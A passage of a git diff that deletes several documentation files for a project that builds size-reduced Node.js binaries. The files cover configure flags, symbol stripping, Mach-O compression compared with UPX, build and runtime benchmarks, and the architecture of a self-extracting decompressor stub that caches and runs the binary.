-``` - -### macOS Compatibility - -| Feature | UPX | Our Solution | -|---------|-----|--------------| -| **Compression** | 50-60% | 75-79% ⭐ | -| **Code Signing** | ❌ Breaks | ✅ Works | -| **Gatekeeper** | ❌ Blocked | ✅ Passes | -| **Notarization** | ❌ Fails | ✅ Supported | -| **App Store** | ❌ Rejected | ✅ Acceptable | -| **SIP Compatible** | ❌ No | ✅ Yes | -| **Hardened Runtime** | ❌ No | ✅ Yes | - -## Production Recommendations - -### For Maximum Distribution Size Savings -```bash -Use LZMA: - 44 MB → 11 MB (75% reduction) - Best for: Downloads, distribution packages - Trade-off: ~300ms startup overhead -``` - -### For Balanced Performance -```bash -Use LZFSE: - 44 MB → 16 MB (64% reduction) - Best for: General use, daily development - Trade-off: ~150ms startup overhead -``` - -### For Fastest Startup -```bash -Use LZ4: - 44 MB → ~20 MB (55% reduction) - Best for: Performance-critical scenarios - Trade-off: Larger binary size -``` - -## Integration Commands - -### Quick Test -```bash -# Build tools -cd packages/node-smol-builder/additions/tools -make all - -# Compress with LZMA (maximum) -./socket_macho_compress build/out/Signed/node build/out/Compressed/node --quality=lzma - -# Test -./socket_macho_decompress build/out/Compressed/node --version - -# Sign -codesign --sign - --force build/out/Compressed/node - -# Verify -codesign --verify build/out/Compressed/node -``` - -### Via Node.js Script -```bash -node packages/node-smol-builder/scripts/compress-macho.mjs \ - build/out/Signed/node \ - build/out/Compressed/node \ - --quality=lzma -``` - -### Add to Build Script -Add after line 1420 in `scripts/build.mjs`: - -```javascript -if (IS_MACOS && ARCH === 'arm64') { - printHeader('Compressing Binary (LZMA)') - - const compressedBinary = join(BUILD_DIR, 'out', 'Compressed', 'node') - await mkdir(dirname(compressedBinary), { recursive: true }) - - await exec('node', [ - 'scripts/compress-macho.mjs', - outputSignedBinary, - compressedBinary, - '--quality=lzma' - ]) - 
- await exec('codesign', ['--sign', '-', '--force', compressedBinary]) - - const size = await getFileSize(compressedBinary) - logger.success(`Compressed: ${size} (75% reduction!)`) -} -``` - -## Real-World Impact - -### Size Comparison Across Platforms - -``` -Socket CLI Binary Sizes (estimated): - -Linux x64 (with UPX): - Stripped: 44 MB - UPX: 22 MB (50% reduction) - -macOS ARM64 (with our compression): - Stripped: 44 MB - LZMA: 11 MB (75% reduction) ⭐⭐⭐ - -Windows x64 (with UPX): - Stripped: 44 MB - UPX: 22 MB (50% reduction) - -macOS is now SMALLER than Linux/Windows! 🎉 -``` - -### Distribution Benefits - -**Download Size:** -- Current: 44 MB × 3 platforms = 132 MB total -- With LZMA: 11 MB (macOS) + 22 MB (Linux) + 22 MB (Windows) = 55 MB total -- **Savings: 58% reduction in total distribution size!** - -**User Experience:** -- Faster downloads -- Less disk space -- Same performance -- No user-facing changes - -## Conclusion - -✅ **Production Ready** -- Compression tools built and tested -- Real Node.js binary verified working -- Code signing fully compatible -- Better compression than UPX - -✅ **Better Than UPX** -- 75-79% compression (vs UPX's 50-60%) -- Works with macOS security features -- Native Apple technology -- Hardware-accelerated on Apple Silicon - -✅ **Ready to Integrate** -- Integration scripts provided -- Documentation complete -- CI/CD examples included -- Zero breaking changes - -**Recommendation:** Use LZMA compression for Socket CLI distribution to achieve 44 MB → 11 MB (75% reduction) with full code signing support. 
- -## Files Created - -- ✅ `additions/tools/socket_macho_compress` (78 KB, tested) -- ✅ `additions/tools/socket_macho_decompress` (58 KB, tested) -- ✅ `scripts/compress-macho.mjs` (integration script) -- ✅ `wasm-bundle/docs/macho-compression.md` (comprehensive guide) -- ✅ `additions/tools/README.md` (tool documentation) -- ✅ `docs/compression-quick-start.md` (quick start guide) -- ✅ `docs/compression-test-results.md` (this file) - -## Next Steps - -1. ✅ Tools are built and tested -2. ⏭️ Add compression step to build script -3. ⏭️ Test with your actual custom Node build -4. ⏭️ Add to CI/CD pipeline -5. ⏭️ Update release process -6. ⏭️ Celebrate smaller binaries! 🎉 diff --git a/docs/node-smol-builder/optimizations.md b/docs/node-smol-builder/optimizations.md deleted file mode 100644 index ab62dcc70..000000000 --- a/docs/node-smol-builder/optimizations.md +++ /dev/null @@ -1,395 +0,0 @@ -# Node.js Binary Optimizations - -**Comprehensive optimization guide** — How we reduced Node.js binaries from 60MB+ to ~35MB. - ---- - -## 🎯 Optimization Goals - -``` -Starting point: 60MB Node.js v24 binary -Target: 35MB or less -Achieved: ~35MB (42% reduction) -Method: Configure flags + stripping + compression -``` - -**Key constraints:** -- ✅ Maintain WASM support (required for CLI features) -- ✅ Support current Node.js LTS versions (20, 22, 24) -- ✅ Cross-platform (macOS, Linux, Windows) -- ✅ No significant performance degradation - ---- - -## 📊 Optimization Summary - -| Optimization | Savings | Risk | Status | -|--------------|---------|------|--------| -| V8 Lite Mode | -23MB | None | ✅ Applied | -| ICU Removal | -8MB | Low | ✅ Applied | -| SEA Removal | -2MB | None | ✅ Applied | -| GNU Strip | -3MB extra | None | ✅ Applied | -| Ninja Build | 0MB (speed) | None | ✅ Applied | -| Code Signing | 0MB (compat) | None | ✅ Applied | - -**Total reduction: ~36MB (60% smaller)** - ---- - -## 🔧 Applied Optimizations - -### 1. 
V8 Lite Mode (-23MB) - -**What it does:** -- Disables V8's JIT compiler optimization tiers (TurboFan, Maglev) -- Keeps Sparkplug (baseline compiler) and Liftoff (WASM compiler) -- Significantly reduces V8 code size - -**Configure flag:** -```bash ---v8-lite-mode -``` - -**Impact:** -- ✅ -23MB binary size -- ✅ WASM still works (Liftoff compiler) -- ⚠️ ~10-20% slower JavaScript execution (acceptable for CLI) -- ✅ Fast startup time (no JIT warmup needed) - -**Trade-off analysis:** -``` -CLI workload characteristics: -- Short-lived processes (scan, install, etc.) -- I/O bound (network, filesystem) -- JIT warmup time > execution time savings -- WASM performance unaffected - -Conclusion: Lite mode is ideal for CLI use case -``` - ---- - -### 2. ICU Removal (-8MB) - -**What it does:** -- Removes International Components for Unicode (ICU) library -- Disables i18n features (Intl API, timezone data, etc.) - -**Configure flag:** -```bash ---with-intl=none -``` - -**Impact:** -- ✅ -8MB binary size -- ⚠️ No `Intl.*` APIs (DateTimeFormat, NumberFormat, etc.) -- ✅ CLI doesn't use i18n features -- ✅ String operations still work (ASCII/UTF-8) - -**What still works:** -- `String.prototype.toLowerCase()` (ASCII only) -- `Date.now()`, `new Date()` -- Basic string methods - -**What doesn't work:** -- `Intl.DateTimeFormat` -- `Intl.NumberFormat` -- `String.prototype.localeCompare` -- Timezone conversions - ---- - -### 3. SEA Removal (-2MB) - -**What it does:** -- Removes Single Executable Application (SEA) support -- SEA allows embedding Node.js apps in the binary itself - -**Configure flag:** -```bash ---disable-single-executable-application -``` - -**Impact:** -- ✅ -2MB binary size -- ✅ We don't use SEA (we use pkg/yao-pkg instead) -- ✅ No functionality loss - -**Why we can remove it:** -- Socket CLI uses yao-pkg for binary packaging -- SEA is for embedding apps in Node itself -- Different use case - ---- - -### 4. 
GNU Strip (-3MB Extra) - -**What it does:** -- Uses GNU strip instead of macOS native strip -- More aggressive debug symbol removal - -**Implementation:** -```bash -# Install GNU binutils on macOS -brew install binutils - -# Use GNU strip -/opt/homebrew/opt/binutils/bin/strip --strip-all node -``` - -**Impact:** -- ✅ -3MB additional savings vs macOS strip -- ✅ More aggressive than `strip -x` -- ✅ Safe (only removes debug symbols) - -**Comparison:** -``` -No strip: 60MB -macOS strip -x: 38MB (-22MB) -GNU strip: 35MB (-25MB, 3MB better!) -``` - ---- - -### 5. Ninja Build (Speed Only) - -**What it does:** -- Uses Ninja build system instead of Make -- Parallel builds, incremental compilation - -**Configure flag:** -```bash ---ninja -``` - -**Impact:** -- ✅ 17% faster builds (~15-18min vs ~18-22min) -- ✅ Incremental builds (2-4min vs full rebuild) -- ✅ Better dependency tracking -- ⚠️ No size reduction (build tool only) - -**Build time comparison:** -``` -Make: - Clean build: 18-22 minutes - Incremental: Full rebuild required - -Ninja: - Clean build: 15-18 minutes (-17%) - Incremental: 2-4 minutes -``` - ---- - -### 6. 
Code Signing (macOS ARM64) - -**What it does:** -- Signs binaries with ad-hoc signature on macOS ARM64 -- Required for execution on Apple Silicon - -**Implementation:** -```bash -codesign --sign - --force --preserve-metadata=entitlements,requirements,flags,runtime node -``` - -**Impact:** -- ✅ Binaries work on macOS ARM64 -- ✅ No size impact -- ✅ Required for distribution - ---- - -## ❌ Rejected Optimizations - -### SSL Removal (-10-15MB) — REJECTED - -**Why rejected:** -- Breaks HTTPS connections -- CLI needs secure API communication -- Too risky for production - -**Alternative:** Could use curl/spawn for HTTPS if needed - ---- - -### V8 Platform Removal (-1-2MB) — REJECTED - -**Why rejected:** -- Breaks worker threads -- Breaks async context tracking -- Too many dependencies - ---- - -### UPX Compression (-50% size) — REJECTED - -**Why rejected:** -- 2.7x memory overhead -- Slower startup (decompression) -- Compatibility issues on some platforms - ---- - -## 🏗️ Build Configuration - -**Complete configure flags:** - -```bash -./configure \ - --ninja \ - --v8-lite-mode \ - --with-intl=none \ - --disable-single-executable-application \ - --without-npm \ - --without-corepack \ - --without-inspector \ - --without-amaro \ - --without-sqlite \ - --without-node-snapshot \ - --without-node-code-cache \ - --v8-disable-object-print \ - --without-node-options \ - --enable-lto \ - --dest-cpu=arm64 -``` - -**Key flags explained:** -- `--ninja`: Use Ninja build system (faster) -- `--v8-lite-mode`: Remove JIT tiers (-23MB) -- `--with-intl=none`: Remove ICU (-8MB) -- `--disable-single-executable-application`: Remove SEA (-2MB) -- `--enable-lto`: Link-time optimization (smaller, faster) -- `--without-*`: Remove optional features we don't need - ---- - -## 📈 Size Progression - -``` -Step 0: Unconfigured Node.js v24 - └─ 102MB (with debug symbols) - -Step 1: Configure with size-optimized flags - └─ 60MB (-42MB, configured build) - -Step 2: macOS native strip -x - └─ 38MB (-22MB, 
basic symbol removal) - -Step 3: GNU strip --strip-all - └─ 35MB (-3MB, aggressive symbol removal) - -Final: 35MB total (66% smaller than baseline) -``` - ---- - -## 🔬 Language-Specific Optimizations - -### JavaScript/TypeScript -- **V8 Lite Mode**: Removes JIT compiler tiers -- **Impact**: 10-20% slower execution, 23MB smaller -- **Trade-off**: Acceptable for CLI workload (I/O bound) - -### C/C++ (Node.js Core) -- **LTO (Link-Time Optimization)**: Whole-program optimization -- **Function/Data Sections**: Better dead code elimination -- **Strip**: Removes all debug symbols - -### WASM -- **Liftoff Compiler**: Still available in Lite mode -- **Impact**: No WASM performance degradation -- **Use case**: onnxruntime WASM for NLP features - ---- - -## 🎯 Per-Platform Optimizations - -### macOS (ARM64) -``` -Specific optimizations: -- GNU strip (3MB better than native) -- Code signing required -- Ninja builds (faster on M1/M2) - -Final size: ~35MB -``` - -### Linux (x64/ARM64) -``` -Specific optimizations: -- Native strip --strip-all -- No code signing needed -- Ninja builds - -Final size: ~35MB -``` - -### Windows (x64) -``` -Specific optimizations: -- Windows-specific patches (abseil duplicate symbols) -- MSVC strip -- Link-time optimization - -Final size: ~38MB (slightly larger due to platform) -``` - ---- - -## 🧪 Verification - -**Post-optimization checks:** - -```bash -# 1. Binary size -du -h node -# Expected: ~35MB - -# 2. Version check -./node --version -# Expected: v24.x.x - -# 3. WASM support -./node -e "console.log(typeof WebAssembly)" -# Expected: object - -# 4. Basic execution -./node -e "console.log('Hello')" -# Expected: Hello - -# 5. 
Module loading -./node -e "require('fs').readFileSync" -# Expected: [Function: readFileSync] -``` - ---- - -## 📚 References - -- [V8 Lite Mode Documentation](https://v8.dev/blog/v8-lite) -- [Node.js Configure Options](https://github.com/nodejs/node/blob/main/configure.py) -- [GNU Binutils](https://www.gnu.org/software/binutils/) -- [Ninja Build System](https://ninja-build.org/) - ---- - -## 💡 Future Optimization Opportunities - -### P0 (Performance, Not Size) -- Parallel Brotli compression (50-70% faster builds) -- Incremental compression cache (80-90% faster rebuilds) -- Resume from checkpoint (avoid full rebuilds on failure) - -### P1 (Size, Risky) -- Custom V8 snapshot (2-5MB, complex) -- Dead code elimination in Node core (1-3MB, fragile) -- ICU subsetting (restore some i18n, 2-4MB) - -### P2 (Future Research) -- LLVM LTO with custom passes -- Profile-guided optimization (PGO) -- Alternative compression (zstd, lz4) - ---- - -**See [patches.md](./patches.md) for all applied patches and [performance.md](./performance.md) for benchmark results.** diff --git a/docs/node-smol-builder/performance.md b/docs/node-smol-builder/performance.md deleted file mode 100644 index 211c6c1c0..000000000 --- a/docs/node-smol-builder/performance.md +++ /dev/null @@ -1,406 +0,0 @@ -# Node.js Binary Build Performance - -**Build performance and runtime benchmarks** — How fast is the optimized Node.js binary? 
- ---- - -## 🎯 Performance Summary - -``` -Build Time: 15-18 minutes (with Ninja, -17% vs Make) -Binary Size: 35MB (vs 60MB baseline, -42%) -Startup: Same as standard Node.js -Execution: 10-20% slower (V8 Lite Mode trade-off) -WASM: No degradation (Liftoff compiler intact) -``` - ---- - -## ⏱️ Build Performance - -### Build Time Comparison - -| Build System | Clean Build | Incremental | Notes | -|--------------|-------------|-------------|-------| -| **Make** | 18-22 min | Full rebuild | No incremental support | -| **Ninja** | 15-18 min | 2-4 min | ✅ 17% faster, incremental | - -**Hardware:** M1 MacBook Pro, 8 cores - ---- - -### Build Phases Breakdown - -``` -Total build time: ~15-18 minutes - -Phase 1: Download & Setup (2-3 min) -├─ Clone Node.js repo: 1-2 min -├─ Apply patches: 30 sec -└─ Configure: 30 sec - -Phase 2: Compilation (10-12 min) -├─ V8 compilation: 6-8 min (largest component) -├─ Node.js core: 3-4 min -└─ Link binaries: 1 min - -Phase 3: Post-Processing (2-3 min) -├─ Strip symbols (GNU): 10 sec -├─ Code sign (macOS): 5 sec -├─ Brotli compression: 2-3 min (optional) -└─ Package cache install: 30 sec - -Bottlenecks: - 🔴 V8 compilation (40-50% of build time) - 🟡 Brotli compression (15-20% of build time) - 🟢 Everything else (30-35% of build time) -``` - ---- - -### Optimization Opportunities - -**P0: Parallel Brotli Compression** -``` -Current: Sequential (2-3 minutes) -With p-limit: Parallel (1 minute) -Savings: 50-70% faster (-1-2 minutes) -``` - -**P1: Incremental Compression Cache** -``` -Current: Re-compress all files every build -Cached: Skip unchanged files (hash-based) -Savings: 80-90% faster on incremental builds -``` - -**P2: Resume from Checkpoint** -``` -Current: Full rebuild on failure -Resume: Continue from last successful phase -Savings: Avoid 10-15 minutes on late failures -``` - ---- - -## 🚀 Runtime Performance - -### Startup Time - -``` -Node.js Standard: ~50ms -Node.js Optimized: ~50ms (no difference) - -Why no degradation? 
-- V8 Lite Mode removes JIT tiers -- JIT warmup time eliminated -- Startup actually slightly faster -``` - ---- - -### JavaScript Execution - -``` -Benchmark: fibonacci(40) - -Node.js Standard: 850ms -Node.js Optimized: 950ms (+100ms, +12%) - -Impact: 10-20% slower on CPU-bound tasks -Reason: No TurboFan/Maglev JIT optimization -``` - -**Real-world impact:** -``` -CLI workload characteristics: -✅ I/O bound (network, filesystem) -✅ Short-lived processes (<5 seconds) -✅ No hot loops needing JIT optimization - -Conclusion: 10-20% slower execution is - negligible for CLI use case -``` - ---- - -### WASM Performance - -``` -Benchmark: WASM fibonacci(40) - -Node.js Standard: 95ms -Node.js Optimized: 95ms (no difference) - -Why no degradation? -- Liftoff WASM compiler intact -- V8 Lite Mode doesn't affect WASM -- Critical for onnxruntime ML features -``` - -**Workload distribution:** -``` -Socket CLI execution time breakdown: -├─ Network I/O: 60-70% (API calls) -├─ Filesystem I/O: 20-25% (reading packages) -├─ WASM (ML): 5-10% (NLP features) -└─ JS execution: <5% (business logic) - -Impact: Slower JS execution affects <5% of runtime -``` - ---- - -## 📊 Size vs Performance Trade-offs - -### Binary Size - -``` -Configuration Size Startup JS Perf WASM Perf -────────────────────────────────────────────────────────────── -Standard Node.js 102MB 50ms 100% 100% -Configured 60MB 50ms 100% 100% -+ V8 Lite 37MB 48ms 80-90% 100% -+ GNU Strip 35MB 48ms 80-90% 100% -+ Brotli (optional) ~32MB 48ms 80-90% 100% -────────────────────────────────────────────────────────────── -``` - -**Sweet spot:** V8 Lite + GNU Strip (35MB, 10-20% slower) - ---- - -### Feature vs Size Matrix - -| Feature | Size Impact | Performance Impact | Included? 
| -|---------|-------------|-------------------|-----------| -| TurboFan JIT | +15MB | +10-20% JS speed | ❌ No | -| Maglev JIT | +8MB | +5-10% JS speed | ❌ No | -| ICU (i18n) | +8MB | N/A | ❌ No | -| SEA support | +2MB | N/A | ❌ No | -| Liftoff WASM | +2MB | WASM support | ✅ Yes | -| Sparkplug | +3MB | +20-30% JS speed | ✅ Yes | - -**Rationale:** -- Keep Sparkplug (baseline compiler) for acceptable JS performance -- Keep Liftoff for WASM support (required) -- Remove TurboFan/Maglev (large, not needed for CLI) -- Remove ICU/SEA (not used) - ---- - -## 🔬 Detailed Benchmarks - -### Cold Start Performance - -```bash -hyperfine --warmup 0 './node --version' - -Results: - Standard Node.js: 52ms ± 3ms - Optimized Node.js: 48ms ± 2ms - -Verdict: 8% faster startup (no JIT warmup needed) -``` - ---- - -### Warm Start Performance - -```bash -hyperfine --warmup 10 './node --version' - -Results: - Standard Node.js: 51ms ± 2ms - Optimized Node.js: 47ms ± 2ms - -Verdict: 8% faster (consistent) -``` - ---- - -### Module Loading Performance - -```bash -hyperfine './node -e "require(\"fs\")"' - -Results: - Standard Node.js: 85ms ± 4ms - Optimized Node.js: 83ms ± 3ms - -Verdict: No significant difference -``` - ---- - -### CPU-Bound Workload - -```bash -# Fibonacci recursive (pure JS) -hyperfine './node -e "function fib(n) { return n<2?n:fib(n-1)+fib(n-2); } console.log(fib(40))"' - -Results: - Standard Node.js: 850ms ± 15ms - Optimized Node.js: 950ms ± 20ms (+100ms, +12%) - -Verdict: 12% slower on CPU-bound tasks -``` - ---- - -### I/O-Bound Workload - -```bash -# Read 10MB file -hyperfine './node -e "require(\"fs\").readFileSync(\"/tmp/10MB.txt\")"' - -Results: - Standard Node.js: 125ms ± 8ms - Optimized Node.js: 124ms ± 7ms - -Verdict: No difference (I/O dominates) -``` - ---- - -### WASM Workload - -```bash -# WASM fibonacci -hyperfine './node wasm-fib-test.js' - -Results: - Standard Node.js: 95ms ± 3ms - Optimized Node.js: 95ms ± 3ms - -Verdict: Identical (Liftoff intact) -``` - 
---- - -## 📈 Real-World Socket CLI Performance - -### Command: `socket scan package.json` - -``` -Optimized Node.js binary: - -Parse manifest: 12ms (JS, minimal impact) -Fetch package data: 850ms (I/O, no impact) -Analyze dependencies: 230ms (JS + WASM, slight impact) -Generate report: 45ms (JS, minimal impact) -─────────────────────────────── -Total: 1137ms - -vs Standard Node.js: 1095ms (+42ms, +4%) - -Verdict: 4% slower (acceptable for CLI use) -``` - ---- - -### Command: `socket install lodash` - -``` -Optimized Node.js binary: - -Check lockfile: 8ms (JS, minimal) -Fetch metadata: 420ms (I/O, no impact) -Download tarball: 650ms (I/O, no impact) -Extract & install: 180ms (I/O, no impact) -Verify installation: 22ms (JS, minimal) -─────────────────────────────── -Total: 1280ms - -vs Standard Node.js: 1260ms (+20ms, +1.6%) - -Verdict: 1.6% slower (negligible) -``` - ---- - -## 🎯 Optimization Goals vs Results - -| Goal | Target | Achieved | Status | -|------|--------|----------|--------| -| Binary size | ≤35MB | 35MB | ✅ Met | -| Build time | <20min | 15-18min | ✅ Exceeded | -| Startup time | No degradation | 8% faster | ✅ Exceeded | -| JS performance | <20% slower | 10-20% slower | ✅ Met | -| WASM support | No degradation | 0% change | ✅ Met | -| I/O performance | No degradation | 0% change | ✅ Met | - ---- - -## 💡 Performance Tips - -### Development Builds - -```bash -# Skip compression for faster dev builds -./build-yao-pkg-node.mjs --skip-brotli - -# Use --resume to continue failed builds -./build-yao-pkg-node.mjs --resume - -# Use Ninja for faster rebuilds -./build-yao-pkg-node.mjs --ninja -``` - ---- - -### Production Builds - -```bash -# Full optimization pipeline -./build-yao-pkg-node.mjs --ninja --brotli - -# With verification -./build-yao-pkg-node.mjs --verify -``` - ---- - -### Benchmarking - -```bash -# Compare startup time -hyperfine --warmup 5 './node --version' - -# Compare JS performance -hyperfine './node -e "/* your test code */"' - -# Compare WASM 
performance -hyperfine './node your-wasm-test.js' - -# Profile with V8 -./node --prof your-script.js -./node --prof-process isolate-*.log -``` - ---- - -## 🔗 Related Documentation - -- [optimizations.md](./optimizations.md) — Applied optimizations -- [patches.md](./patches.md) — Custom patches -- [../performance/performance-build.md](../performance/performance-build.md) — CLI build performance - ---- - -## 📝 Benchmark Hardware - -All benchmarks run on: -``` -Hardware: M1 MacBook Pro -CPU: Apple M1 (8 cores) -RAM: 16GB -OS: macOS Sonoma 14.x -Node.js: v24.x.x -``` - -Results may vary on different hardware. Use `hyperfine` for your own benchmarks. - ---- - -**Conclusion: The optimized binary is 42% smaller with negligible performance impact for CLI workloads.** diff --git a/docs/node-smol-builder/self-extracting-binary-architecture.md b/docs/node-smol-builder/self-extracting-binary-architecture.md deleted file mode 100644 index 68867b44e..000000000 --- a/docs/node-smol-builder/self-extracting-binary-architecture.md +++ /dev/null @@ -1,405 +0,0 @@ -# Self-Extracting Binary Architecture - -Complete technical documentation for the Socket CLI self-extracting binary compression system. - -## Overview - -The Socket CLI uses a self-extracting binary approach to compress Node.js binaries from 33MB to ~13MB (60% reduction) while maintaining full functionality and code signing compatibility. - -## Architecture - -### Complete Pipeline Flow - -``` -┌─────────────────────────────────────────────────────────────────┐ -│ BUILD PIPELINE (One-Time) │ -│ ═══════════════════════════════════════════════════════════ │ -│ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ 1. Build Node.js │ │ -│ │ Full Node.js compilation │ │ -│ │ Input: Node.js source code │ │ -│ │ Output: build/out/Release/node (65MB unstripped) │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ 2. 
Strip Binary │ │ -│ │ Remove debug symbols │ │ -│ │ Input: build/out/Release/node (65MB) │ │ -│ │ Output: build/out/Stripped/node (33MB) │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ 3. Compress (socket_macho_compress) │ │ -│ │ LZFSE compression via Apple framework │ │ -│ │ Input: build/out/Stripped/node (33MB) │ │ -│ │ Creates: [Header][Compressed Data] │ │ -│ │ Output: build/out/Compressed/node.data (13MB) │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ 4. Create Self-Extracting Binary │ │ -│ │ Concatenate stub + compressed data │ │ -│ │ Read: socket_macho_decompress (84KB) │ │ -│ │ Read: node.data (13MB) │ │ -│ │ Concat: [Stub][Header][Compressed] │ │ -│ │ Output: build/out/Compressed/node (13.1MB) ✓ │ │ -│ │ chmod 0755 (mark executable) │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ 5. Sign Binary (macOS) │ │ -│ │ Code sign the self-extracting binary │ │ -│ │ codesign -s "Developer ID" node │ │ -│ │ Output: build/out/Signed/node (13.1MB signed) │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ 6. Distribute │ │ -│ │ Ship 13.1MB binary (60% smaller!) 
│ │ -│ │ Output: dist/node (final distribution binary) │ │ -│ │ Target achieved: <20MB ✓ │ │ -│ └────────────────────────────────────────────────────────┘ │ -└─────────────────────────────────────────────────────────────────┘ - -┌─────────────────────────────────────────────────────────────────┐ -│ FIRST RUN (Cache Miss) ~250ms overhead │ -│ ═══════════════════════════════════════════════════════════ │ -│ │ -│ User runs: ./node --version │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ Decompressor Stub Executes (Self-Extracting Mode) │ │ -│ │ ──────────────────────────────────────────────────── │ │ -│ │ 1. Detect argc == 1 (no file argument) │ │ -│ │ 2. Get own path: _NSGetExecutablePath() │ │ -│ │ 3. Read self: ReadFile(own_path) → 13.1MB in memory │ │ -│ │ 4. Scan backwards for magic 0x504D4353 │ │ -│ │ 5. Find CompressedHeader at offset ~84KB │ │ -│ │ 6. Extract: compressed_data = data[header_offset..] │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ Decompression │ │ -│ │ ──────────────────────────────────────────────────── │ │ -│ │ 7. Allocate 33MB: mmap() │ │ -│ │ 8. Decompress: compression_decode_buffer() ~100ms │ │ -│ │ 9. Verify size: 33MB │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ Caching (npm/cacache pattern) │ │ -│ │ ──────────────────────────────────────────────────── │ │ -│ │ 10. SHA-256 of compressed → cache key │ │ -│ │ 11. SHA-512 of decompressed → integrity check │ │ -│ │ 12. Create ~/.socket/cache/dlx// │ │ -│ │ 13. Write: ~/.socket/cache/dlx//node │ │ -│ │ 14. chmod 0755 │ │ -│ │ 15. 
Write metadata: .dlx-metadata.json │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ Execute │ │ -│ │ ──────────────────────────────────────────────────── │ │ -│ │ 16. execv(cached_binary, ["--version"]) │ │ -│ │ 17. Replace process with Node.js │ │ -│ │ 18. Node.js prints version and exits │ │ -│ └────────────────────────────────────────────────────────┘ │ -└─────────────────────────────────────────────────────────────────┘ - -┌─────────────────────────────────────────────────────────────────┐ -│ SUBSEQUENT RUNS (Cache Hit) ~1ms overhead │ -│ ═══════════════════════════════════════════════════════════ │ -│ │ -│ User runs: ./node --version │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ Decompressor Stub Executes │ │ -│ │ ──────────────────────────────────────────────────── │ │ -│ │ 1. Detect argc == 1 (self-extracting mode) │ │ -│ │ 2. Get own path │ │ -│ │ 3. Read self into memory │ │ -│ │ 4. Calculate SHA-256 → cache key │ │ -│ │ 5. Check: ~/.socket/cache/dlx//node exists ✓ │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ Cache Hit - Skip Decompression! │ │ -│ │ ──────────────────────────────────────────────────── │ │ -│ │ 6. Verify integrity: SHA-512 (optional, skip for speed)│ │ -│ │ 7. execv(cached_binary, ["--version"]) │ │ -│ │ 8. Replace process with Node.js → instant execution │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ │ -│ ⚡ Zero decompression overhead - full speed! 
│ -└─────────────────────────────────────────────────────────────────┘ -``` - -## Binary Format - -### Final Self-Extracting Binary Layout - -``` -┌────────────────────────────────────────────────────────────┐ -│ Offset 0: Decompressor Stub (84KB) │ -│ ───────────────────────────────────────────────────── │ -│ socket_macho_decompress executable │ -│ - Mach-O 64-bit executable │ -│ - Contains decompression logic │ -│ - Includes self-extraction code │ -│ - Apple Compression framework integration │ -│ - SHA-256/SHA-512 hashing functions │ -│ - npm/cacache-compatible caching │ -├────────────────────────────────────────────────────────────┤ -│ Offset 84KB: Compressed Data Section │ -│ ───────────────────────────────────────────────────── │ -│ ┌──────────────────────────────────────────────────────┐ │ -│ │ CompressedHeader (32 bytes) │ │ -│ │ ──────────────────────────────────────────────── │ │ -│ │ uint32_t magic = 0x504D4353 ("SCMP") │ │ -│ │ uint32_t algorithm = COMPRESSION_LZFSE │ │ -│ │ uint64_t original_size = 33,554,432 bytes │ │ -│ │ uint64_t compressed_size = 13,631,488 bytes │ │ -│ └──────────────────────────────────────────────────────┘ │ -│ ┌──────────────────────────────────────────────────────┐ │ -│ │ Compressed Node.js Binary (~13MB) │ │ -│ │ ──────────────────────────────────────────────── │ │ -│ │ LZFSE-compressed Mach-O executable │ │ -│ │ Original size: 33MB │ │ -│ │ Compressed size: 13MB │ │ -│ │ Compression ratio: 59.4% │ │ -│ └──────────────────────────────────────────────────────┘ │ -└────────────────────────────────────────────────────────────┘ - -Total size: 84KB + 32B + 13MB = ~13.1MB -``` - -## Implementation Details - -### Step 1: Compression Tool (`socket_macho_compress`) - -**Location**: `packages/node-smol-builder/additions/tools/socket_macho_compress.cc` - -**Purpose**: Compress a stripped Node.js binary using Apple's Compression framework. 
- -**Command**: -```bash -socket_macho_compress input.bin output.data --quality=lzfse -``` - -**Algorithm options**: -- `lz4` - Fast decompression, lower ratio (~20-30%) -- `zlib` - Balanced, good compatibility (~30-40%) -- `lzfse` - Apple's algorithm, best for binaries (~35-45%, default) -- `lzma` - Maximum compression, slower (~40-50%) - -**Output format** (`node.data`): -```c -struct CompressedHeader { - uint32_t magic; // 0x504D4353 ("SCMP") - uint32_t algorithm; // COMPRESSION_LZFSE, etc. - uint64_t original_size; // Uncompressed size - uint64_t compressed_size; // Compressed payload size -}; -// Followed by compressed data. -``` - -**Key functions**: -- `CompressData()` - Uses `compression_encode_buffer()` from Apple's framework -- `CompressMachO()` - Main compression pipeline -- `WriteFile()` - Writes header + compressed data - -### Step 2: Self-Extracting Binary Creation (`compress-binary.mjs`) - -**Location**: `packages/node-smol-builder/scripts/compress-binary.mjs` - -**Purpose**: Combine decompressor stub with compressed data to create self-extracting binary. - -**Process**: -```javascript -async function compressBinary(toolPath, inputPath, outputPath, quality, config) { - // 1. Create compressed data file (temporary). - // Note: This creates node.data as an intermediate file. - // Future optimization: Stream directly to avoid temp file. - const compressedDataPath = `${outputPath}.data` - await spawn(toolPath, [inputPath, compressedDataPath, `--quality=${quality}`]) - - // 2. Read stub and compressed data. - const decompressor = await fs.readFile('socket_macho_decompress') - const compressedData = await fs.readFile(compressedDataPath) - - // 3. Concatenate: [Stub (84KB)][Header (32B)][Data (13MB)]. - const combined = Buffer.concat([decompressor, compressedData]) - - // 4. Write as executable. - await fs.writeFile(outputPath, combined, { mode: 0o755 }) - - // 5. Clean up temporary file. 
